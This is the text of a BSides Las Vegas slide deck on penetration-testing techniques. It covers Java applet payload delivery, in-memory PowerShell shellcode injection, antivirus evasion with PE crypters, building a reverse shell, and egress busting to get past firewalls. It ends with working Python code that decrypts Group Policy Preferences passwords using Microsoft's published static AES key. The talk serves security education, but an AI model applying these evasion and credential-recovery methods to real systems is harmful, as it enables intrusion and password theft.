BSIDES Las Vegas Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com @TrustedSec
Introduc)on As penetration testers, exploit writers, huggers, etc. we have secret techniques we always use. Although some may or may not be public, they are generally obscure and not well known.
The purpose of today s talk is to show you my secrets.. Some of my techniques that I use that aren t widely known. Why show you? I m an open book on everything I do and sharing is what it s all about.
Technique #1 Java Applet Attack (SET) Well known attack method right? Do you know how it actually works? Do you know the techniques behind it to make it successful?
ZOMG APT News agencies around the world discovered a new and extremely advanced zero-day exploit against Java. Made me feel kind of special =) How people found out it was set?
ILIKEHUGS
DEMO: Walking through the Attack
Explaining the Applet Parameters that are injected into the HTML code are pulled from the Applet. Obfuscated and randomized each time. Parameters tell the Applet which attacks to use.
Method 1 Binary Dropper Binary is downloaded from attacker machine via web server (Java downloader) Obfuscated binary each time per deployment.. Combination of PE manipulation, UPX, and rewriting binary on fly (import pefile)
DEMO: Binary Dropping Technique
Method 1 Weak Sauce Binary s are easily picked up by AV if signatures focus on obfuscation techniques. (SET changes them each version) Direct interaction with Windows file system and writing to disk. Multiple points of evidence on victim machine.
Method 2 Shellcodeexec Shellcodeexec method drops a custom compiled and modified version of shellcodeexec by Bernardo Damele. Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space. Alphanumeric shellcode is executed in memory and payload is delivered.
DEMO: ShellcodeExec
Method 2 Easily detectable Shellcodeexec is a simple yet awesome method but still has a number of drawbacks. Like Method 1 Binary s can be picked up unless custom version created. Direct interaction with Windows file system and writing to disk. Like Method 1 - Multiple points of evidence on victim machine.
Method 3 Powershell Injec)on Detect if Powershell is installed (installed by default on Vista and Windows 7 and 8). Powershell gives us complete flexibility on a number of post exploitation situations. Technique discovered by Matthew Graeber (you rock).
Method 3 PS ShellCode Injec)on Applet detects if powershell is installed on system. Grabs the operating system type (x86 / x64) Deploys Shellcode straight through powershell.
DEMO: ShellcodeExec
Method 3 Powershell Injec)on Never touches disk AV / HIPS signatures go out the door. Obfuscated each time so that memory inspection is extremely difficult. Extremely reliable and stable.
PE Security Evasion
Scenario 1 Dropping PE s like its hot Your using Metasploit All of them are being picked up by AV, HIPS, etc. Most cases, I will rewrite the exe template for Metasploit to customize binary for evasion. Couple cool ways to do this.
Modifying PE For Evasion in MSF Easiest way for me is to make a simple program that creates a RWX process then have the program execute Metasploit Shellcode. You can also modify the Metasploit exe.rb template and obfuscate the code that way.
PE Crypters One of my favorites was recently released called Hyperion (Christian Ammann from nullsecurity.net). Encrypts PE the file using a randomized simple cipher key with AES 128. When executable is run, it brute forces the AES key then decrypts the PE file for you.
DEMO: Hyperion
Hyperion Encryp)on Very cool concept and easy to use and write one for yourself. Ability to have a completely unique PE file each time. Slight downfall, stub used for brute force is not polymorphic.
Building a Simple Reverse Shell
The Reverse Shell Connects out to the attacker (reverse shell).
Compiling Binaries PyInstaller Compiles python code for you into a binary by wrapping the Python Interpreter into the executable. Works on Linux, OSX, and Windows. python Configure.py python Makespec.py onefile noconsole shell.py python Build.py shell/shell.spec cd shell\dist
Making it easy pybuild.py All code and samples will be released on the TrustedSec website soon.
DEMO: Building a Shell
Bypassing AV
Finding your way home
Bumping the Firewall A number of companies restrict ports outbound and only allow what s needed for the business. Trouble getting payloads out, especially if you only have one shot.
Egress Bus)ng Few ways to do it, pre-staged payload for identifying way out. Attempt staged reverse on every port. Metasploit has an ALLPORTS payload as well.
Egress Buster 0.2 Server/Client situation where victim connects out on every port 1024 ports at a time. Server listens for connection and reports back. Here s where you can have some fun.
Egress Buster Reverse Shell
Egress Buster Reverse Shell Released this week! Allows you to bust all ports inside the firewall and spawn a command shell. Custom, so no AV picks this up. Byte compiled into an executable.
DEMO: Egress Buster Reverse Shell
Egress Buster Reverse Shell Usage Recent Penetration Test Found file upload + execute binary s. Could not find a standard port out i.e. 80, 443, 53, 25, etc. Wrote this to deploy and found several obscure ports that were allowed.
Fun with Group Policy
One of my PERSONAL Favorites How many times have we been on a pentest with just a domain user? Need that local administrator account for all of the domain computers? Research from: Sogeti ESEC Pentest Article: http://esec-pentest.sogeti.com/ exploiting-windows-2008-group-policypreferences
The AZack Navigate to a domain controller and hit up the SYSVOL share. Head to the domain name and Policies folder. Look for a GUID then MACHINE \Preferences\Group. Look for the Groups.xml file.
Contents of File
Sta)c Key for AES Anyone?
Python Code # code was developed and created from # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences from Crypto.Cipher import AES from base64 import b64decode key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex') cpassword = b64decode("j1uyj3vx8ty9ltlzil2uauzkfqa/4latt76zwgdhdhw=") o = AES.new(key, 2).decrypt(cpassword) print o[:-ord(o[-1])].decode('utf16')
Decrypted Password >>> print o[:-ord(o[-1])].decode('utf16') Local*P4ssword!
Expanding on Group.xml
More Passwords Stored The folks over at rewt dance ( http://rewtdance.blogspot.com/ 2012/06/exploiting-windows-2008- group-policy.html) found a few more areas that store passwords using the cpassword attribute. Services, ScheduledTasks, SQL servers and much more are impacted.
List of Other Affected Areas (from rewt dance) Services\Services.xml http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13) ScheduledTasks\ScheduledTasks.xml http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13) http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13) http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13) Printers\Printers.xml http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13) Drives\Drives.xml http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13) DataSources\DataSources.xml http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
There s a ton more of these Hopefully can make these a series.
Downloads For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
Secret Pentesting Techniques Shhh... Dave Kennedy Founder, Principal Security Consultant Email: davek@trustedsec.com https://www.trustedsec.com TrustedSec, LLC @TrustedSec